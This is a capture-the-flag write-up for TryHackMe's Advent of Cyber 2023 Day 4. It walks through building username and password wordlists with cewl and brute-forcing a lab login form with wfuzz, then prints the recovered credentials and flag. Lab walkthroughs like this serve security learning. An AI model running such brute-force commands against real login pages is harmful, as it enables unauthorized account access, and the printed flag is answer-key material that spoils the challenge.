Advent Of Cyber 2023 Day-4

Advent Of Cyber 2023 Day-4

  1. First, I started the machine of the task of day 4.

  2. Then in order to use AntarctiCrafts homepage to generate a wordlist that could potentially hold the key to the portal, I used this command:

    cewl -d 2 -m 5 -w passwords.txt MACHINE_IP --with-numbers

  1. Then to narrow down the search as the page of teams might contain the desired information, I used this command:

    cewl -d 0 -m 5 -w usernames.txt MACHINE_IP/team.php --lowercase

  2. Then to check the size of the files, I used ls -al command.

  1. Next, I used the command head passwords.txt to see the top part of the password list.

  1. Then I used the given address to open the login page where it was requiring credentials.

  1. Since Wfuzz is a tool designed for brute-forcing web applications, I used this command:

    wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u MACHINE_IP/login.php -d "username=FUZZ&password=FUZ2Z"

Using this command led to finding the username and password

Which were:

Username: isaias

Password: Happiness

  1. I used these credentials to log into that page and obtained the flag.

Finally, I found the flag!

Flag: THM{m3rrY4nt4rct1crAft$}